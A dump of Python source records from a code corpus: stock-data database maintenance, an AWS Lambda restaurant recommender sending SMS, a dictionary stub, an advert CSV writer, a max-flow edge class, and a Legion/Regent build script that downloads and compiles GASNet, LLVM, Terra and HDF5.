item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" mgsy update\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't update \" + item + \" meiGuShouYi\" + \"\\n\")\n\t\t\t\t\tcontinue\n\t\t\telif mgsyName not in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tconstructDatabase(item[0:6],item[6:9],'N','N',self.dp).writeGunDongJingZhiMeiGuShouYiToDatabase()\n\t\t\t\t\t#print('constructed mgsy ' + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" mgsy construct\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't construct \" + item + \" meiGuShouYi\" + \"\\n\")\n\t\t\t\t\tcontinue\n\tdef updateMgjzc(self,uniqueStockList,stl,logH):\n\t\tlogHandle = 
logH\n\t\tstockTableList = stl\n\t\tuniqueStockList1 = uniqueStockList\n\t\tfor item in uniqueStockList1:\n\t\t\t#print(\"doing \" + item)\n\t\t\t#mgsyName = \"MeiGuShouYi_\" + item[0:6]\n\t\t\tmgjzcName = \"MeiGuJingZiChan_\" + item[0:6]\n\t\t\t#fhName = \"MeiNianFenHong_\" + item[0:6]\n\t\t\tif mgjzcName in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tupdateDatabase(item[0:6],item[6:9],'N','N',self.dp).meiGuJingZiChanUpdate()\n\t\t\t\t\t#print(\"updated mgjzc \" + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" mgjzc update\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't update \" + item + \" meiGuJingZiChan\" + \"\\n\")\n\t\t\t\t\tcontinue\n\t\t\telif mgjzcName not in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tconstructDatabase(item[0:6],item[6:9],'N','N',self.dp).writeMeiGuJingZiChanToDatabase()\n\t\t\t\t\t#print('constructed mgjzc ' + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" mgjzc construct\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't construct \" + item + \" meiGuJingZiChan\" + \"\\n\")\n\t\t\t\t\tcontinue\n\tdef updateSinaFh(self,uniqueStockList,stl,logH):\n\t\tlogHandle = logH\n\t\tstockTableList = stl\n\t\tuniqueStockList1 = uniqueStockList\n\t\tfor item in uniqueStockList1:\n\t\t\t#print(\"doing \" + item)\n\t\t\t#mgsyName = \"MeiGuShouYi_\" + item[0:6]\n\t\t\t#mgjzcName = \"MeiGuJingZiChan_\" + item[0:6]\n\t\t\tfhName = \"MeiNianFenHong_\" + item[0:6]\n\t\t\tif fhName in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tupdateDatabase(item[0:6],item[6:9],'N','N',self.dp).fenHongFromSinaUpdate()\n\t\t\t\t\t#print(\"updated fh \" + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + ' fh update')\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't update \" + item + \" fenHongFromSina\" + \"\\n\")\n\t\t\t\t\tcontinue\n\t\t\telif fhName not in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tconstructDatabase(item[0:6],item[6:9],'N','N',self.dp).writeFenHongFromSinaIntoDatabase()\n\t\t\t\t\t#print('constructed fh ' + item)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(item[0:6] + \" fh construct\")\n\t\t\t\t\tprint(e)\n\t\t\t\t\tlogHandle.write(\"can't construct \" + item + \" fenHongFromSina\" + \"\\n\")\n\t\t\t\t\tcontinue\n\n\nif __name__ == '__main__':\n\n\t# indexFile= \"D:/programe-data/database/stockHistInfoDatabase/000827_index_components.txt\"\n\t# database = \"D:/programe-data/database/stockHistInfoDatabase/stockInfo.db\"\n\tmaintainDatabase().maintainDbAll()","sub_path":"unusedCode/finaDataUpdate.py","file_name":"finaDataUpdate.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"188062131","text":"import json\nimport boto3\nfrom elasticsearch import Elasticsearch\n\ndef getEsData(cuisine):\n    query = {\n        \"size\": 5,\n        \"query\": {\n            \"match\": {\n                \"cuisine\": cuisine\n            }\n        }\n    }\n    es = Elasticsearch(['https://search-temp-fjykqtiytwbo6eomvvxvxhh4w4.us-east-1.es.amazonaws.com/'])\n    result = es.search(index='example_index', body=query)\n    listofrest = result['hits']['hits']\n    restans = []\n    for rest in listofrest:\n        restans.append(rest['_source'][\"id\"])\n    # print(\"This is restans : \",restans)\n    return restans\n\ndef getFromDynamo(ids):\n    dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\n    table = dynamodb.Table('yelp-restaurants')\n    item = []\n    for id in ids:\n        result = table.get_item(Key={\n            'id': id\n        })\n        
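# get_item returns the stored record under the 'Item' key; only its 'info'\n        # attribute is collected here (this assumes every id coming back from\n        # Elasticsearch still exists in the DynamoDB table)\n        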
item.append(result['Item']['info'])\n    return item\n\ndef sendMessage(cuisine, information, phone):\n    session = boto3.Session()\n    sns_client = session.client('sns')\n    message = \"Your recommendations for \"+str(cuisine)+\" restaurants are \\n\"\n    for i in range(len(information)):\n        rec = information[i]\n        # print(\"This is rec : \",rec)\n        message += (str(i+1) + '. ')\n        message += (rec['name'] + \" at \" + rec['address'])\n        message += \"\\n\"\n        if i != len(information)-1:\n            message += \" \"\n        else:\n            message += \".\"\n    \n    print(\"The message is : \", message)\n    sns_client.publish(\n        PhoneNumber=phone,\n        Message=message,\n        MessageAttributes={\n            'AWS.SNS.SMS.SenderID': {\n                'DataType': 'String',\n                'StringValue': 'SENDERID'\n            },\n            'AWS.SNS.SMS.SMSType': {\n                'DataType': 'String',\n                'StringValue': 'Promotional'\n            }\n        }\n    )\n    \nqueue = 'https://sqs.us-east-1.amazonaws.com/205569651032/concierge'\n\ndef lambda_handler(event, context):\n    sqs = boto3.client('sqs')\n    queue_url = 'https://sqs.us-east-1.amazonaws.com/205569651032/concierge'\n    # tempsqs = boto3.resource('sqs')\n    # queueval = tempsqs.Queue(queue_url)\n    deleteids = []\n    # Receive message from SQS queue\n    response = sqs.receive_message(\n        QueueUrl=queue_url,\n        AttributeNames=[\n            'SentTimestamp'\n        ],\n        MaxNumberOfMessages=1,\n        MessageAttributeNames=[\n            'All'\n        ], \n        VisibilityTimeout=0,\n        WaitTimeSeconds=0\n    )\n    print(\"Message has been received from sqs : \", response)\n    if (response and 'Messages' in response):\n        # print(response['Messages'])\n        cuisine = response['Messages'][0][\"MessageAttributes\"][\"cuisine\"][\"StringValue\"]\n        phone = response['Messages'][0][\"MessageAttributes\"][\"phone\"][\"StringValue\"]\n        if phone[0] != '+':\n            if phone[0] != '1':\n                phone = \"+1\" + phone\n            else:\n                phone = \"+\" + phone\n        print(cuisine, phone)\n        ids = getEsData(cuisine)\n        result = getFromDynamo(ids)\n        sendMessage(cuisine, result, phone)\n        sqs.delete_message(QueueUrl=queue_url, ReceiptHandle=response[\"Messages\"][0][\"ReceiptHandle\"])\n        print(result)\n    return response\n","sub_path":"backend/lambdas/lf2.py","file_name":"lf2.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"21285035","text":"\n\n# class header\nclass _DISTRESSED:\n\tdef __init__(self):\n\t\tself.name = \"DISTRESSED\"\n\t\tself.definitions = [u'upset or worried: ', u'having problems because of having too little money: ', u'a distressed material has been treated to make it look as if it has been used for a long time: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_distressed.py","file_name":"_distressed.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"649838920","text":"import csv\n\nad1 = dict()\nad1['name'] = 'HAD light-green tourist buff'\nad1['category'] = 'TOURISM'\nad1['description'] = 'HAD light-green tourist buff\\n\\nPickup or delivery via Nova Poshta\\n' \\\n                     'I can take measurements on request, just message me :)'\nad1['price'] = '40'\nad1['weight'] = '0-0.5 kg'\nad1['private or business'] = '0'\nad1['state'] = '0'\nad1['number of photos'] = 
'2'\n\ndict_data = list()\ncsv_columns = list(ad1.keys())\ndict_data.append(ad1)\n\ncsv_file = \"Adverts.csv\"\ntry:\n    with open(csv_file, 'w') as f:\n        writer = csv.DictWriter(f, fieldnames=csv_columns)\n        writer.writeheader()\n        for data in dict_data:\n            writer.writerow(data)\nexcept IOError:\n    print(\"I/O error\")\n\nprint(ad1)\n","sub_path":"olx_mindgames/advert.py","file_name":"advert.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143466398","text":"FLOATING_POINT_EPSILON = 1E-10\r\n\r\nclass FlowEdge:\r\n\r\n    def __init__(self, v, w, cap):\r\n        if (v < 0 or w < 0):\r\n            raise Exception(\"vertex index must be a non-negative integer\")\r\n        if (cap < 0):\r\n            raise Exception(\"Edge capacity must be non-negative\")\r\n        self.__v = v\r\n        self.__w = w\r\n        self.__capacity = cap\r\n        self.__flow = 0.0\r\n    \r\n    \r\n    @classmethod\r\n    def fromFlow(class_object, v, w, cap, flow):\r\n        obj = class_object(v,w,cap)\r\n        if (v < 0 or w < 0):\r\n            raise Exception(\"vertex index must be a non-negative integer\")\r\n        if (cap < 0):\r\n            raise Exception(\"Edge capacity must be non-negative\")\r\n        if (not (flow >= 0.0)):\r\n            raise Exception(\"Flow is negative\")\r\n        if (not (flow <= cap)):\r\n            raise Exception(\"Flow exceeds capacity\")\r\n        obj.__flow = flow\r\n        return obj\r\n    \r\n    \r\n    # 'from' is a reserved word in Python, hence the capitalized accessor names\r\n    def From(self):\r\n        return self.__v\r\n\r\n    def To(self):\r\n        return self.__w\r\n\r\n    def capacity(self):\r\n        return self.__capacity\r\n\r\n    def flow(self):\r\n        return self.__flow\r\n\r\n    def other(self, vertex):\r\n        if (vertex == self.__v):\r\n            return self.__w\r\n        elif (vertex == self.__w):\r\n            return self.__v\r\n        else:\r\n            raise Exception(\"Invalid endpoint\")\r\n\r\n    def residualCapacityTo(self, vertex):\r\n        if (vertex == self.__v):\r\n            return self.__flow\r\n        elif (vertex == self.__w):\r\n            return self.__capacity - self.__flow\r\n        else:\r\n            raise Exception(\"Invalid endpoint\")\r\n\r\n    def addResidualFlowTo(self, vertex, delta):\r\n        if (not (delta >= 0.0)):\r\n            raise Exception(\"Delta must be nonnegative\")\r\n        \r\n        if (vertex == self.__v):\r\n            self.__flow -= delta\r\n        elif (vertex == self.__w):\r\n            self.__flow += delta\r\n        else:\r\n            raise Exception(\"Invalid endpoint\")\r\n        \r\n        if (abs(self.__flow) <= FLOATING_POINT_EPSILON):\r\n            self.__flow = 0.0\r\n        if (abs(self.__flow - self.__capacity) <= FLOATING_POINT_EPSILON):\r\n            self.__flow = self.__capacity\r\n\r\n        if (not (self.__flow >= 0.0)):\r\n            raise Exception(\"Flow is negative\")\r\n        if (not (self.__flow <= self.__capacity)):\r\n            raise Exception(\"Flow exceeds capacity\")\r\n\r\n    def __str__(self):\r\n        return str(self.__v) + \"->\" +\\\r\n               str(self.__w) + \" \" +\\\r\n               str(self.__flow) + \"/\" +\\\r\n               str(self.__capacity)\r\n","sub_path":"BaseballElimination/FlowEdge.py","file_name":"FlowEdge.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"554652964","text":"#!/usr/bin/env python\n\n# Copyright 2019 Stanford University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# 
See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom __future__ import print_function\nimport argparse, hashlib, multiprocessing, os, platform, re, subprocess, sys, tempfile, traceback\n\ndef discover_llvm_version():\n if platform.node().startswith('titan'):\n return '38'\n elif os.environ.get('LMOD_SYSTEM_NAME') == 'summit': # Summit doesn't set hostname\n return '60'\n else:\n return '60'\n\ndef discover_skip_certificate_check():\n if platform.node().startswith('titan'):\n return True\n else:\n return False\n\ndef discover_conduit():\n if 'CONDUIT' in os.environ:\n return os.environ['CONDUIT']\n elif platform.node().startswith('cori'):\n return 'aries'\n elif platform.node().startswith('daint'):\n return 'aries'\n elif platform.node().startswith('excalibur'):\n return 'aries'\n elif platform.node().startswith('quartz'):\n return 'psm'\n elif platform.node().startswith('titan'):\n return 'gemini'\n elif os.environ.get('LMOD_SYSTEM_NAME') == 'summit': # Summit doesn't set hostname\n return 'ibv'\n else:\n raise Exception('Please set CONDUIT in your environment')\n\ndef gasnet_enabled():\n if 'USE_GASNET' in os.environ:\n return os.environ['USE_GASNET'] == '1'\n return platform.system() != 'Darwin'\n\ndef hdf_enabled():\n return 'USE_HDF' in os.environ and os.environ['USE_HDF'] == '1'\n\ndef check_sha256(file_path, sha256):\n with open(file_path, 'rb') as f:\n assert hashlib.sha256(f.read()).hexdigest() == sha256\n\ndef download(dest_path, url, sha256, insecure=False):\n dest_dir = os.path.dirname(dest_path)\n dest_file = os.path.basename(dest_path)\n insecure_flag = []\n if insecure:\n insecure_flag = ['--insecure']\n\n if os.path.exists(dest_path):\n check_sha256(dest_path, sha256)\n return\n\n subprocess.check_call(['curl'] + insecure_flag + ['-o', dest_path, url])\n check_sha256(dest_path, sha256)\n\ndef extract(dest_dir, archive_path, format):\n if format == 'gz':\n subprocess.check_call(['tar', 'xfz', archive_path], cwd=dest_dir)\n elif format == 'xz':\n subprocess.check_call(['tar', 'xfJ', archive_path], cwd=dest_dir)\n else:\n raise Exception('Unknown format %s' % format)\n\ndef apply_patch(dest_dir, diff_path, strip_levels=1):\n subprocess.check_call(['patch', '-p%d' % strip_levels, '-i', diff_path], cwd=dest_dir)\n\ndef git_clone(repo_dir, url, branch=None):\n if branch is not None:\n subprocess.check_call(['git', 'clone', '-b', branch, url, repo_dir])\n else:\n subprocess.check_call(['git', 'clone', url, repo_dir])\n\ndef git_update(repo_dir):\n subprocess.check_call(\n ['git', 'pull', '--ff-only'],\n cwd=repo_dir)\n\ndef build_gasnet(gasnet_dir, conduit):\n subprocess.check_call(['make', 'CONDUIT=%s' % conduit], cwd=gasnet_dir)\n\ndef build_llvm(source_dir, build_dir, install_dir, use_cmake, cmake_exe, thread_count, is_cray):\n env = None\n if is_cray:\n env = dict(list(os.environ.items()) + [\n ('CC', os.environ['HOST_CC']),\n ('CXX', os.environ['HOST_CXX']),\n ])\n if use_cmake:\n subprocess.check_call(\n [cmake_exe,\n '-DCMAKE_INSTALL_PREFIX=%s' % install_dir,\n '-DCMAKE_BUILD_TYPE=Release',\n '-DLLVM_ENABLE_ASSERTIONS=OFF',\n '-DLLVM_ENABLE_ZLIB=OFF',\n '-DLLVM_ENABLE_TERMINFO=OFF',\n '-DLLVM_ENABLE_LIBEDIT=OFF',\n source_dir],\n cwd=build_dir,\n env=env)\n else:\n subprocess.check_call(\n [os.path.join(source_dir, 'configure'),\n '--prefix=%s' % install_dir,\n '--enable-optimized',\n '--disable-assertions',\n '--disable-zlib',\n '--disable-terminfo'],\n cwd=build_dir,\n env=env)\n subprocess.check_call(['make', 
'-j', str(thread_count)], cwd=build_dir)\n subprocess.check_call(['make', 'install'], cwd=build_dir)\n\ndef build_terra(terra_dir, terra_branch, llvm_dir, cache, is_cray, thread_count):\n if cache:\n subprocess.check_call(['make', 'download'], cwd=terra_dir)\n return\n\n env = {}\n if terra_branch.startswith('luajit2.1'):\n # https://github.com/LuaJIT/LuaJIT/issues/484\n\n # Note: you *can't* set MACOSX_DEPLOYMENT_TARGET globally,\n # because it will break Terra build outright. It must be set\n # for LuaJIT and *only* LuaJIT, so to do that we use the PR\n # branch directly.\n env['LUAJIT_URL'] = 'https://github.com/elliottslaughter/LuaJIT.git'\n env['LUAJIT_BRANCH'] = 'patch-1'\n env.update(dict(list(os.environ.items())))\n if is_cray:\n env.update(dict([\n ('CC', os.environ['HOST_CC']),\n ('CXX', os.environ['HOST_CXX']),\n ]))\n\n flags = [\n 'LLVM_CONFIG=%s' % os.path.join(llvm_dir, 'bin', 'llvm-config'),\n 'CLANG=%s' % os.path.join(llvm_dir, 'bin', 'clang'),\n ]\n if platform.system() != 'Darwin':\n flags.append('REEXPORT_LLVM_COMPONENTS=irreader mcjit x86')\n flags.extend(['-j', str(thread_count)])\n\n subprocess.check_call(\n ['make'] + flags,\n cwd=terra_dir,\n env=env)\n\ndef build_hdf(source_dir, install_dir, thread_count, is_cray):\n env = None\n if is_cray:\n env = dict(list(os.environ.items()) + [\n ('CC', os.environ['HOST_CC']),\n ('CXX', os.environ['HOST_CXX']),\n ])\n subprocess.check_call(\n ['./configure',\n '--prefix=%s' % install_dir,\n '--enable-threadsafe',\n '--disable-hl'],\n cwd=source_dir,\n env=env)\n subprocess.check_call(['make', '-j', str(thread_count)], cwd=source_dir)\n subprocess.check_call(['make', 'install'], cwd=source_dir)\n\ndef build_regent(root_dir, use_cmake, cmake_exe,\n gasnet_dir, llvm_dir, terra_dir, hdf_dir, conduit, thread_count):\n env = dict(list(os.environ.items()) +\n ([('CONDUIT', conduit),\n ('GASNET', gasnet_dir),\n ('USE_GASNET', '1')]\n if gasnet_enabled() else []) +\n ([('HDF_ROOT', hdf_dir),\n ('USE_HDF', '1')]\n if hdf_enabled() else []) +\n [('LLVM_CONFIG', os.path.join(llvm_dir, 'bin', 'llvm-config'))]\n )\n\n subprocess.check_call(\n [os.path.join(root_dir, 'install.py'),\n '--with-terra', terra_dir,\n '--rdir', 'auto',\n '-j', str(thread_count),\n ] + (['--cmake', '--with-cmake', cmake_exe]\n if use_cmake else ['--no-cmake']),\n env=env)\n\ndef install_llvm(llvm_dir, llvm_install_dir, scratch_dir, llvm_version, llvm_use_cmake, cmake_exe, thread_count, cache, is_cray, insecure):\n try:\n os.mkdir(llvm_dir)\n except OSError:\n pass # Hope this means it already exists\n assert(os.path.isdir(llvm_dir))\n\n mirror = 'http://sapling.stanford.edu/~eslaught/llvm' # 'https://releases.llvm.org'\n if llvm_version == '35':\n llvm_tarball = os.path.join(llvm_dir, 'llvm-3.5.2.src.tar.xz')\n llvm_source_dir = os.path.join(llvm_dir, 'llvm-3.5.2.src')\n clang_tarball = os.path.join(llvm_dir, 'cfe-3.5.2.src.tar.xz')\n clang_source_dir = os.path.join(llvm_dir, 'cfe-3.5.2.src')\n download(llvm_tarball, '%s/3.5.2/llvm-3.5.2.src.tar.xz' % mirror, '44196156d5749eb4b4224fe471a29cc3984df92570a4a89fa859f7394fc0c575', insecure=insecure)\n download(clang_tarball, '%s/3.5.2/cfe-3.5.2.src.tar.xz' % mirror, '4feb575f74fb3a74b6245400460230141bf610f235ef3a25008cfe6137828620', insecure=insecure)\n elif llvm_version == '38':\n llvm_tarball = os.path.join(llvm_dir, 'llvm-3.8.1.src.tar.xz')\n llvm_source_dir = os.path.join(llvm_dir, 'llvm-3.8.1.src')\n clang_tarball = os.path.join(llvm_dir, 'cfe-3.8.1.src.tar.xz')\n clang_source_dir = os.path.join(llvm_dir, 
'cfe-3.8.1.src')\n download(llvm_tarball, '%s/3.8.1/llvm-3.8.1.src.tar.xz' % mirror, '6e82ce4adb54ff3afc18053d6981b6aed1406751b8742582ed50f04b5ab475f9', insecure=insecure)\n download(clang_tarball, '%s/3.8.1/cfe-3.8.1.src.tar.xz' % mirror, '4cd3836dfb4b88b597e075341cae86d61c63ce3963e45c7fe6a8bf59bb382cdf', insecure=insecure)\n elif llvm_version == '39':\n llvm_tarball = os.path.join(llvm_dir, 'llvm-3.9.1.src.tar.xz')\n llvm_source_dir = os.path.join(llvm_dir, 'llvm-3.9.1.src')\n clang_tarball = os.path.join(llvm_dir, 'cfe-3.9.1.src.tar.xz')\n clang_source_dir = os.path.join(llvm_dir, 'cfe-3.9.1.src')\n download(llvm_tarball, '%s/3.9.1/llvm-3.9.1.src.tar.xz' % mirror, '1fd90354b9cf19232e8f168faf2220e79be555df3aa743242700879e8fd329ee', insecure=insecure)\n download(clang_tarball, '%s/3.9.1/cfe-3.9.1.src.tar.xz' % mirror, 'e6c4cebb96dee827fa0470af313dff265af391cb6da8d429842ef208c8f25e63', insecure=insecure)\n elif llvm_version == '60':\n llvm_tarball = os.path.join(llvm_dir, 'llvm-6.0.1.src.tar.xz')\n llvm_source_dir = os.path.join(llvm_dir, 'llvm-6.0.1.src')\n clang_tarball = os.path.join(llvm_dir, 'cfe-6.0.1.src.tar.xz')\n clang_source_dir = os.path.join(llvm_dir, 'cfe-6.0.1.src')\n download(llvm_tarball, '%s/6.0.1/llvm-6.0.1.src.tar.xz' % mirror, 'b6d6c324f9c71494c0ccaf3dac1f16236d970002b42bb24a6c9e1634f7d0f4e2', insecure=insecure)\n download(clang_tarball, '%s/6.0.1/cfe-6.0.1.src.tar.xz' % mirror, '7c243f1485bddfdfedada3cd402ff4792ea82362ff91fbdac2dae67c6026b667', insecure=insecure)\n else:\n assert False\n\n if not cache:\n extract(llvm_dir, llvm_tarball, 'xz')\n extract(llvm_dir, clang_tarball, 'xz')\n if llvm_version == '35':\n apply_patch(llvm_source_dir, os.path.join(os.path.dirname(os.path.realpath(__file__)), 'llvm-3.5-gcc.patch'))\n os.rename(clang_source_dir, os.path.join(llvm_source_dir, 'tools', 'clang'))\n\n llvm_build_dir = tempfile.mkdtemp(prefix='setup_env_llvm_build', dir=scratch_dir or llvm_dir)\n os.mkdir(llvm_install_dir)\n build_llvm(llvm_source_dir, llvm_build_dir, llvm_install_dir, llvm_use_cmake, cmake_exe, thread_count, is_cray)\n\ndef install_hdf(hdf_dir, hdf_install_dir, thread_count, cache, is_cray, insecure):\n try:\n os.mkdir(hdf_dir)\n except OSError:\n pass # Hope this means it already exists\n assert(os.path.isdir(hdf_dir))\n hdf_tarball = os.path.join(hdf_dir, 'hdf5-1.10.1.tar.gz')\n hdf_source_dir = os.path.join(hdf_dir, 'hdf5-1.10.1')\n download(hdf_tarball, 'http://sapling.stanford.edu/~manolis/hdf/hdf5-1.10.1.tar.gz', '048a9d149fb99aaa1680a712963f5a78e9c43b588d0e79d55e06760ec377c172', insecure=insecure)\n if not cache:\n extract(hdf_dir, hdf_tarball, 'gz')\n build_hdf(hdf_source_dir, hdf_install_dir, thread_count, is_cray)\n\ndef print_advice(component_dir):\n print('Given the number of things that could potentially have gone')\n print('wrong, this script is not designed to handle this situation.')\n print('You will need to fix the problem on your own (or ask for help')\n print('fixing it).')\n print()\n print('The files are located here:')\n print()\n print(component_dir)\n print()\n print('Once you have fixed the problem, you have two options:')\n print()\n print(' 1. Go to the directory and rebuild it yourself. This')\n print(' script will not touch the directory again.')\n print()\n print(' 2. Remove the directory. 
Then rerun this script.')\n print()\n print('Good luck and please ask for help if you get stuck!')\n\ndef report_build_failure(name, component_dir, exception):\n print()\n print('#' * 68)\n print('## Build Failed')\n print('#' * 68)\n print()\n print('It appears that %s has failed to build. The failure was:' % name)\n print()\n traceback.print_exc()\n print()\n print_advice(component_dir)\n sys.exit(1)\n\ndef check_dirty_build(name, build_result, component_dir):\n if not os.path.exists(build_result):\n print()\n print('#' * 68)\n print('## Dirty Previous Build Detected')\n print('#' * 68)\n print()\n print('It appears that %s was not built successfully on a' % name)\n print('previous invocation of this script.')\n print()\n print_advice(component_dir)\n sys.exit(1)\n\ndef driver(prefix_dir=None, scratch_dir=None, cache=False,\n legion_use_cmake=False, llvm_version=None,\n terra_url=None, terra_branch=None, insecure=False):\n if not cache:\n if 'CC' not in os.environ:\n raise Exception('Please set CC in your environment')\n if 'CXX' not in os.environ:\n raise Exception('Please set CXX in your environment')\n if 'LG_RT_DIR' in os.environ:\n raise Exception('Please unset LG_RT_DIR in your environment')\n\n is_cray = 'CRAYPE_VERSION' in os.environ\n\n if not cache and is_cray:\n print('This system has been detected as a Cray system.')\n print()\n print('Note: The Cray wrappers are broken for various purposes')\n print('(particularly, dynamically linked libraries). For this')\n print('reason this script requires that HOST_CC and HOST_CXX')\n print('be set to the underlying compilers (GCC and G++, etc.).')\n print()\n if 'HOST_CC' not in os.environ:\n raise Exception('Please set HOST_CC in your environment')\n if 'HOST_CXX' not in os.environ:\n raise Exception('Please set HOST_CXX in your environment')\n\n if llvm_version == '35':\n llvm_use_cmake = False\n elif llvm_version == '38':\n llvm_use_cmake = False\n elif llvm_version == '39':\n llvm_use_cmake = True\n elif llvm_version == '60':\n llvm_use_cmake = True\n else:\n raise Exception('Unrecognized LLVM version %s' % llvm_version)\n\n root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n legion_dir = os.path.dirname(root_dir)\n\n if prefix_dir is None:\n prefix_dir = root_dir\n else:\n prefix_dir = os.path.abspath(prefix_dir)\n\n thread_count = multiprocessing.cpu_count()\n\n gasnet_release_dir = None\n conduit = None\n if gasnet_enabled():\n gasnet_dir = os.path.realpath(os.path.join(prefix_dir, 'gasnet'))\n if not os.path.exists(gasnet_dir):\n git_clone(gasnet_dir, 'https://github.com/StanfordLegion/gasnet.git')\n if not cache:\n conduit = discover_conduit()\n gasnet_release_dir = os.path.join(gasnet_dir, 'release')\n gasnet_build_result = os.path.join(\n gasnet_release_dir, '%s-conduit' % conduit,\n 'libgasnet-%s-par.a' % conduit)\n if not os.path.exists(gasnet_release_dir):\n try:\n build_gasnet(gasnet_dir, conduit)\n except Exception as e:\n report_build_failure('gasnet', gasnet_dir, e)\n else:\n check_dirty_build('gasnet', gasnet_build_result, gasnet_dir)\n assert os.path.exists(gasnet_build_result)\n\n cmake_exe = None\n try:\n cmake_version = subprocess.check_output(['cmake', '--version']).decode('utf-8')\n except:\n pass # Can't find CMake, continue to download\n else:\n m = re.match(r'cmake version (\\d+)[.](\\d+)', cmake_version)\n if m is not None and (int(m.group(1)) < 3 or int(m.group(2)) < 1):\n pass # CMake is too old, continue to download\n elif m is None:\n raise Exception('Cannot parse CMake 
version:\\n\\n%s' % cmake_version)\n        else:\n            cmake_exe = 'cmake' # CMake is ok, use it\n    if cache or ((legion_use_cmake or llvm_use_cmake) and cmake_exe is None):\n        cmake_stem = 'cmake-3.7.2-%s-x86_64' % platform.system()\n        cmake_basename = '%s.tar.gz' % cmake_stem\n        cmake_url = 'https://cmake.org/files/v3.7/%s' % cmake_basename\n        if cmake_stem == 'cmake-3.7.2-Linux-x86_64':\n            cmake_shasum = '0e6ec35d4fa9bf79800118916b51928b6471d5725ff36f1d0de5ebb34dcd5406'\n        elif cmake_stem == 'cmake-3.7.2-Darwin-x86_64':\n            cmake_shasum = '0175e97748052dfc15ebd3c0aa65286e5ec20ca22ed606ce88940e699496b03c'\n\n        cmake_dir = os.path.realpath(os.path.join(prefix_dir, 'cmake'))\n        cmake_install_dir = os.path.join(cmake_dir, cmake_stem)\n        if not os.path.exists(cmake_dir):\n            os.mkdir(cmake_dir)\n\n        # check_output returns bytes on Python 3; decode before comparing to str\n        proc_type = subprocess.check_output(['uname', '-p']).strip().decode('utf-8')\n        if proc_type != 'x86_64' and proc_type != 'i386':\n            raise Exception(\"Don't know how to download CMake binary for %s\" % proc_type)\n\n        cmake_tarball = os.path.join(cmake_dir, cmake_basename)\n        download(cmake_tarball, cmake_url, cmake_shasum, insecure=insecure)\n        extract(cmake_dir, cmake_tarball, 'gz')\n        assert os.path.exists(cmake_install_dir)\n        cmake_exe = os.path.join(cmake_install_dir, 'bin', 'cmake')\n\n    llvm_dir = os.path.realpath(os.path.join(prefix_dir, 'llvm'))\n    llvm_install_dir = os.path.join(llvm_dir, 'install')\n    llvm_build_result = os.path.join(llvm_install_dir, 'bin', 'llvm-config')\n    if not os.path.exists(llvm_install_dir):\n        try:\n            install_llvm(llvm_dir, llvm_install_dir, scratch_dir, llvm_version, llvm_use_cmake, cmake_exe, thread_count, cache, is_cray, insecure)\n        except Exception as e:\n            report_build_failure('llvm', llvm_dir, e)\n    else:\n        check_dirty_build('llvm', llvm_build_result, llvm_dir)\n    if not cache:\n        assert os.path.exists(llvm_build_result)\n\n    terra_dir = os.path.join(prefix_dir, 'terra.build')\n    terra_build_dir = os.path.join(terra_dir, 'build', 'bin')\n    terra_build_result = os.path.join(terra_dir, 'release', 'bin', 'terra')\n    if not os.path.exists(terra_dir):\n        git_clone(terra_dir, terra_url, terra_branch)\n    if not os.path.exists(terra_build_dir):\n        try:\n            build_terra(terra_dir, terra_branch, llvm_install_dir, cache, is_cray, thread_count)\n        except Exception as e:\n            report_build_failure('terra', terra_dir, e)\n    else:\n        check_dirty_build('terra', terra_build_result, terra_dir)\n    if not cache:\n        assert os.path.exists(terra_build_result)\n\n    hdf_install_dir = None\n    if hdf_enabled():\n        hdf_dir = os.path.join(prefix_dir, 'hdf')\n        hdf_install_dir = os.path.join(hdf_dir, 'install')\n        hdf_build_result = os.path.join(hdf_install_dir, 'lib', 'libhdf5.so')\n        if not os.path.exists(hdf_install_dir):\n            try:\n                install_hdf(hdf_dir, hdf_install_dir, thread_count, cache, is_cray, insecure)\n            except Exception as e:\n                report_build_failure('hdf', 